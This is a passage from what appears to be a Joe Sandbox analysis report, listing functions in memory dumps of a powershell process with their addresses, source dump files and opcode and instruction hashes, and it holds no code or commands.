                                      • Opcode Fuzzy Hash: 0575a2b621c121bf3f07bebb8ae5dcaba7e78835bbe5d81a29fb67b975877296
                                      • Instruction Fuzzy Hash: A231AB313006118FD705DB29E840BAABBA7EFD4356F108669E60ACB355DF70A8458BA0
                                      Function 04CCAF50 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ecc716b91cb754be1cbee0d70d5889f48534ee60bff757bae672556648670c90
                                      • Instruction ID: eb16ce713b2464a1a15ba99aa1a739f6fa15376e84071b940ca3c8be629b13b7
                                      • Opcode Fuzzy Hash: ecc716b91cb754be1cbee0d70d5889f48534ee60bff757bae672556648670c90
                                      • Instruction Fuzzy Hash: 45316AB0A002099FDB04DFB9D494BAEBBF7AF88304F14806DE515EB350EB75AC418B50
                                      Function 04CCAF60 Relevance: .1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31c3ba4a10e4b73826a732be7990d6f276be5baa3734eeb6a2cfc16afee6077b
                                      • Instruction ID: 06ec001ad48cef765318161309dd95decf6da36e79e386207ea4fda1be6b7645
                                      • Opcode Fuzzy Hash: 31c3ba4a10e4b73826a732be7990d6f276be5baa3734eeb6a2cfc16afee6077b
                                      • Instruction Fuzzy Hash: A5314AB0A002099FDB04DFA9D494BAEBAF7EF88340F14806DE515EB350EB75AC018B64
                                      Function 04CCE0A8 Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10073ba6d13641ebe000323ab346a83c81fa9709d45fef9573c8e9769684f6cb
                                      • Instruction ID: 57e0a99a08d4104b9eee7afaf5c3eb18a50945261a0c38e63371b43fddca9d86
                                      • Opcode Fuzzy Hash: 10073ba6d13641ebe000323ab346a83c81fa9709d45fef9573c8e9769684f6cb
                                      • Instruction Fuzzy Hash: C9312574A002048FCB14DF68D458AAEBBF2BF89324F14856DD406EB3A1DB70AD85CB90
                                      Function 04CCE0B8 Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2c05292ff503667620306020f764360ade826454b92e85337015fc1dc079916
                                      • Instruction ID: face2947667826b4be9c92f08b9e933bd56d21089281a93a0207ed054af78e6f
                                      • Opcode Fuzzy Hash: d2c05292ff503667620306020f764360ade826454b92e85337015fc1dc079916
                                      • Instruction Fuzzy Hash: 24310474A002088FCB14DF68D858AAEBBF6BF89714F14856DD406EB3A1DF71AD45CB90
                                      Function 02F4F3D8 Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4985b895ab76bd4809c4df45aa8cbaf4a0007278c5840a111d4a7cdf3321515b
                                      • Instruction ID: b6f0f083550ce63e2e9f953f1489364150c82516cc2a8f82424ad26457ae49ec
                                      • Opcode Fuzzy Hash: 4985b895ab76bd4809c4df45aa8cbaf4a0007278c5840a111d4a7cdf3321515b
                                      • Instruction Fuzzy Hash: ED210776600200DFDB05CF14DAC0B16BF65FB88314F64C699DA0D0A666CB7AD456CB61
                                      Function 04CC94D8 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22d94859a7b1fccdce508d5f0600a1a63a398381524ead6dcc0653a111905c12
                                      • Instruction ID: 00c035b2de6595e6ffe34048addefdf249f5a562d3df43a68899aacf41ea3bc6
                                      • Opcode Fuzzy Hash: 22d94859a7b1fccdce508d5f0600a1a63a398381524ead6dcc0653a111905c12
                                      • Instruction Fuzzy Hash: 00318EB09053848EDB60CF6AD18879AFFF2EF88320F28C15DD45E97256D674A485CB61
                                      Function 02F4F02C Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e9756ab0a28382bfe41ce6fde9ed556fd96ffc36f55d7890c25a7e18dd95fd4
                                      • Instruction ID: f7e7b8e9b6ba0ea0de2dce5d92138c6b36216f667d5ed698dc7639b3c08308ab
                                      • Opcode Fuzzy Hash: 7e9756ab0a28382bfe41ce6fde9ed556fd96ffc36f55d7890c25a7e18dd95fd4
                                      • Instruction Fuzzy Hash: 7B214572A04200DFDB10CF18C8C0B12BFA1EB94724F20CA6DDA0E0B642CBB6E406CA61
                                      Function 04CC94E8 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d85438eb2b4d8e5bdff9817d12aa78485e3448f7e1a16e49329859899e3aaf3
                                      • Instruction ID: 5d7f6754b13acb1c4b464fb8e6b20dce73f5026c6d5a8676833fc68fd1d07155
                                      • Opcode Fuzzy Hash: 3d85438eb2b4d8e5bdff9817d12aa78485e3448f7e1a16e49329859899e3aaf3
                                      • Instruction Fuzzy Hash: E4217AB09057448EDB60CF6AD48878AFFF6EF88320F28C05ED85E97255DB74A481CB64
                                      Function 04CC7744 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b57d358dc103aa38a79d96ef440cc505d1c7bf43d302da5066be516a2e57bc48
                                      • Instruction ID: d958d49c741b343a7a4f6d614dbd365edf6ad7063c0c0d68723464a4f89abe89
                                      • Opcode Fuzzy Hash: b57d358dc103aa38a79d96ef440cc505d1c7bf43d302da5066be516a2e57bc48
                                      • Instruction Fuzzy Hash: 22112E797001198FCB04DBA8D840A9D77F6EFCC761B1440A8E509DB355DB34ED018B91
                                      Function 02F4F3D3 Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                      • Instruction ID: 2ce17107e5ef101ede494d1249aae173145a467adc5dfb542840c071215446b6
                                      • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                      • Instruction Fuzzy Hash: DB219D76904240DFCF06CF10DAC4B16BF72FB88314F24C6A9D9494A666C73AD46ACB91
                                      Function 02F4F027 Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                      • Instruction ID: 5fa01b21c3fba83cd3db4cda74d5550eb23ac1e98d523d157be42e25d71c94ca
                                      • Opcode Fuzzy Hash: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                      • Instruction Fuzzy Hash: 3C11BE75904280CFDB15CF14D5C4B15BF61FB84324F24C6A9D90E4BA56C37AE44ACB61
                                      Function 04CCBDD0 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf6d023574406e597acb02b657f7da1864520be71dda8f4a1f177b23c937ca2e
                                      • Instruction ID: fa61278b5bc2e4c048335d3e0a6c73de47c151ddba0b9cb086cfe1d6bd77bcd1
                                      • Opcode Fuzzy Hash: cf6d023574406e597acb02b657f7da1864520be71dda8f4a1f177b23c937ca2e
                                      • Instruction Fuzzy Hash: EB01D2316087849FD715CBB9D994A5A7FF1EF45210F1848EEE08ACB6A3DA20FC45C701
                                      Function 04CCF430 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a344c3ce2b6dfb13820454bdcd0f595fecf70399eac398384a12298ff4732e3e
                                      • Instruction ID: 3fb27c81ebb54f5562cca9cfded2f4847474be3762fcab7b8c14ceae19bd7019
                                      • Opcode Fuzzy Hash: a344c3ce2b6dfb13820454bdcd0f595fecf70399eac398384a12298ff4732e3e
                                      • Instruction Fuzzy Hash: 2A110535204750CFC728DF79D08086ABBF6EF8931536489ADD48A8B7A0DB36F946CB50
                                      Function 04CCDF80 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 334097652c5171b017bee7a917a8817330fe43b7f79e23a2a5b18786a16e5277
                                      • Instruction ID: 7330ef10bf2b04c931b1a58d85c182bf6c6ea371762e4e89ea9b05b07abc3aef
                                      • Opcode Fuzzy Hash: 334097652c5171b017bee7a917a8817330fe43b7f79e23a2a5b18786a16e5277
                                      • Instruction Fuzzy Hash: 960152357012189FCF119F74E808AAEBBF6FB89315F1440ADE51AD3242DB319911CB91
                                      Function 02F4D01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af9e5f3b3e76c3da6fdad9222203badff063c43f468bd504e3c7953f0f9c51bc
                                      • Instruction ID: 0253ef5b0deb578589f6bd94325cdd03a78bfd29eee73691837423bfdaa19dd4
                                      • Opcode Fuzzy Hash: af9e5f3b3e76c3da6fdad9222203badff063c43f468bd504e3c7953f0f9c51bc
                                      • Instruction Fuzzy Hash: 93012B725043409AE7104B2DDCC4B67FFD8DF517A5F08C41AEE080B28ACBB9A841C7B1
                                      Function 02F4D005 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fff38a49ce99e795c4fb7e2106182d4a60ffa912caf6a84272bd819e5ea3b756
                                      • Instruction ID: 4e697d2da6f866410fffa8cc7c21130794873377359cc520650d626797d37ea3
                                      • Opcode Fuzzy Hash: fff38a49ce99e795c4fb7e2106182d4a60ffa912caf6a84272bd819e5ea3b756
                                      • Instruction Fuzzy Hash: 1701527140E3C05ED7128B258C94B52BFB4DF53624F1DC1DBE9888F1A7C6695845C7B2
                                      Function 04CCC000 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f03f794d41922ca69dc66d3a3014d565d8a00d7241fb2c519f771ad9daee4721
                                      • Instruction ID: 657887ed06e7041fee1ea7631ddddb763b49c91cd3315715076dcfd4d8780160
                                      • Opcode Fuzzy Hash: f03f794d41922ca69dc66d3a3014d565d8a00d7241fb2c519f771ad9daee4721
                                      • Instruction Fuzzy Hash: E5F0AF323093A01FD7118ABA9C5096B7FE9EF8662070945BAF594CB3A3C660CC04C7A0
                                      Function 04CCF8B1 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f6d079bfc37fc2d73a09c9b2ad74d56fe129ff160381bae720ab65f9b00cede
                                      • Instruction ID: 8710f760107d57365c80c96562f32ca700666049b24d2f4367b8f2b1dffd5588
                                      • Opcode Fuzzy Hash: 0f6d079bfc37fc2d73a09c9b2ad74d56fe129ff160381bae720ab65f9b00cede
                                      • Instruction Fuzzy Hash: A101D771D1074AAADF40CFE4C9446EEBBB1FF9A304F24471EE045A6641EBB06686CB81
                                      Function 04CCC010 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e0412dcfbeaec3c3ea997600c081c2c35335da2df71da465afc9cd4d789d6531
                                      • Instruction ID: 883d981da39d5dac82f7f41ad3ba79bded9a1cc5e7042e6f609cb80a47dc6457
                                      • Opcode Fuzzy Hash: e0412dcfbeaec3c3ea997600c081c2c35335da2df71da465afc9cd4d789d6531
                                      • Instruction Fuzzy Hash: 31F0BE323082641FD7008AAA9C44DBBBFEDEFC9620B04407AF958C3351CAB1CD0086A0
                                      Function 04CC91C0 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe30bda5811ca802f8a74befa09fef0cfff04db1ecbefb72727b06916d849ca6
                                      • Instruction ID: c633547c01c4ace8693e8fab8d3c12a5831530ad41b7428b073d3730165d4673
                                      • Opcode Fuzzy Hash: fe30bda5811ca802f8a74befa09fef0cfff04db1ecbefb72727b06916d849ca6
                                      • Instruction Fuzzy Hash: B2F0C2716082645FD301AB24D4183AB7FB6DFC6359F24819ED6058B396DE392C06CBA1
                                      Function 02F4D9A7 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7a85ade8b00acdcd4346ed4a21f7562da58c27ef82886ac7c3d1755912ef536
                                      • Instruction ID: aba6b6d6b59bf7636ae13c99ca67b6b352863dd83166952d89461f59709035d4
                                      • Opcode Fuzzy Hash: e7a85ade8b00acdcd4346ed4a21f7562da58c27ef82886ac7c3d1755912ef536
                                      • Instruction Fuzzy Hash: 8FF0F976600600AF97208F0AD985C27FBEDEBD4774719C55AE94A8B752C771EC41CAA0
                                      Function 04CCDF20 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d25abba125834c21376ec1e737f6bdf65ed87f5917121ff1d34a18068dca124
                                      • Instruction ID: 40fcdbeb85ffcc2aecece19a6c5d03c2ada31d7be3520c63293f942f4ff52e10
                                      • Opcode Fuzzy Hash: 3d25abba125834c21376ec1e737f6bdf65ed87f5917121ff1d34a18068dca124
                                      • Instruction Fuzzy Hash: 34F05E343091408FC3118B2DD494866BBF6AFCA71531911EEE09ACB772DAA1DC02CB50
                                      Function 04CC9240 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccf2aa8889adb74ef6d679c9f4872dcd23a6d667899d0993bdba6c81fa59114b
                                      • Instruction ID: ab7c1181084b1868320392656148974f3ad21f4d5a52033d0409179b09193071
                                      • Opcode Fuzzy Hash: ccf2aa8889adb74ef6d679c9f4872dcd23a6d667899d0993bdba6c81fa59114b
                                      • Instruction Fuzzy Hash: 88F0B4705093545FC761CF78D498396BFE5EB42310F2444AED68EC7242DB356881C750
                                      Function 04CCF8C0 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63e421f5e6ed7ba40b0d6024ab20f0ebf85e2d0197599d3a41c5bac1d366fdaf
                                      • Instruction ID: bf763acd75ffc03ef12de216d48208520ca49b9c3b1bf2b850ecec8e4dd12275
                                      • Opcode Fuzzy Hash: 63e421f5e6ed7ba40b0d6024ab20f0ebf85e2d0197599d3a41c5bac1d366fdaf
                                      • Instruction Fuzzy Hash: C301D271D1074ADBCB04CFE4C8446EDBBB5FF99300F20072EE005A6640EBB02695CB80
                                      Function 04CC7A2C Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ea546870438e0f18239b5b124e6b9e1a1bbeae97889981cba093aec4d4f1657
                                      • Instruction ID: deef60ea476c2fa5781a70c81aa2f27aa99728fcf7470e33f14f9400b54f8364
                                      • Opcode Fuzzy Hash: 5ea546870438e0f18239b5b124e6b9e1a1bbeae97889981cba093aec4d4f1657
                                      • Instruction Fuzzy Hash: B4F0E2317006158FDB189B59D884AAF77E6EB8C365710052DE24ED3200CF746C828B50
                                      Function 04CC7A30 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88244166f1c570a98d4d51cfd9d227899588ea448669cb52c374b47252d04d62
                                      • Instruction ID: c655d1ba74212c48b6d335f4139d700eea95cb3ff1648578f6895c8207fee500
                                      • Opcode Fuzzy Hash: 88244166f1c570a98d4d51cfd9d227899588ea448669cb52c374b47252d04d62
                                      • Instruction Fuzzy Hash: 46F0A7317006145FDB149B5AD84496F7BEAEB88665B10052DE24ED3210DF71BD458B94
                                      Function 02F4D998 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d1e4e8d7efa29bb562043cc8ac10464b012f90746afd44449ed83dba4bff44d
                                      • Instruction ID: 64db4ac31238d3cba883d8a92707861e16cbdccf759bca4f32195752c3c867fe
                                      • Opcode Fuzzy Hash: 3d1e4e8d7efa29bb562043cc8ac10464b012f90746afd44449ed83dba4bff44d
                                      • Instruction Fuzzy Hash: 45F0F976500640AFD725CF06DD85D23BBB9EBC5664B198499B84A8B352C771FC42CBA0
                                      Function 04CC775F Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8060e3ec2f773ad680e688860294ec29ce16671072e9ec64dd9cdf3a65b654e8
                                      • Instruction ID: 9b7cca28b39d2bcbd800c24a4e970ccebf882b182856b6dcf4237fb21b00ee46
                                      • Opcode Fuzzy Hash: 8060e3ec2f773ad680e688860294ec29ce16671072e9ec64dd9cdf3a65b654e8
                                      • Instruction Fuzzy Hash: 11F0A0397005198FDB01DBA8D840A997BE7EFCC7627144168D649CB354DF34DD028F91
                                      Function 04CC91D0 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0eb02a6edd18c4a8509d3d343dc06deb4f99e18e1114fe91e74fc7d70ad6660
                                      • Instruction ID: 96654ad53f4b03f0db2ca598693b84a0a10d1e1e3e51a4ae064c3c5e79919b64
                                      • Opcode Fuzzy Hash: b0eb02a6edd18c4a8509d3d343dc06deb4f99e18e1114fe91e74fc7d70ad6660
                                      • Instruction Fuzzy Hash: D7F027716041244BE300AB64C4183EB7BA7DFC4358F20816EDA0547398DE792802CBE0
                                      Function 04CCDD70 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cd92e715262cf3527f365eb48419ec5e8ed7525418e084b6f4a4dbb947c9c34
                                      • Instruction ID: d36bff9f858bba648c5520818e03492eef8cc3b0483f8ae4884cf6e8adb5ac61
                                      • Opcode Fuzzy Hash: 1cd92e715262cf3527f365eb48419ec5e8ed7525418e084b6f4a4dbb947c9c34
                                      • Instruction Fuzzy Hash: FEF0E53160A7902FC317933D981089F7FA6DEC757131445AEE186CB212CE55DC0A87F6
                                      Function 04CC9629 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85a1d99831273014b44318a1bac45e97e3bfb42ed8cd717f96c0528e74e840f4
                                      • Instruction ID: 9ce4d119acf8d5775e275f1580dbcf9e52165b054b7fb4172f4748aacac1899d
                                      • Opcode Fuzzy Hash: 85a1d99831273014b44318a1bac45e97e3bfb42ed8cd717f96c0528e74e840f4
                                      • Instruction Fuzzy Hash: 54E0C0123070920A43C422BC441067B558B8FD62F671403BFD555C72C3CC14CC02C371
                                      Function 04CCDF30 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bec62f0a43a4019e18887ff48e0d6c31bbae19717fd8599858d21b3492179d17
                                      • Instruction ID: 7f9b15ec21a0c0874316b35d423db86370a97ce83a6cfdc442e1f60a9549ed9c
                                      • Opcode Fuzzy Hash: bec62f0a43a4019e18887ff48e0d6c31bbae19717fd8599858d21b3492179d17
                                      • Instruction Fuzzy Hash: B2E0E5353102148F83109B1ED498C2AB7FBEFCEB2575910AAF54ACB361DA61EC01CB90
                                      Function 04CCDDC1 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bd138edd36ee8df28d97aa3e0b6d52526055379dbb4f92364d62a8ff2ffe4ac
                                      • Instruction ID: 7a40abddd426ade1170c94ca1139adab3a8feba623cc611c091a18a4d1c911ad
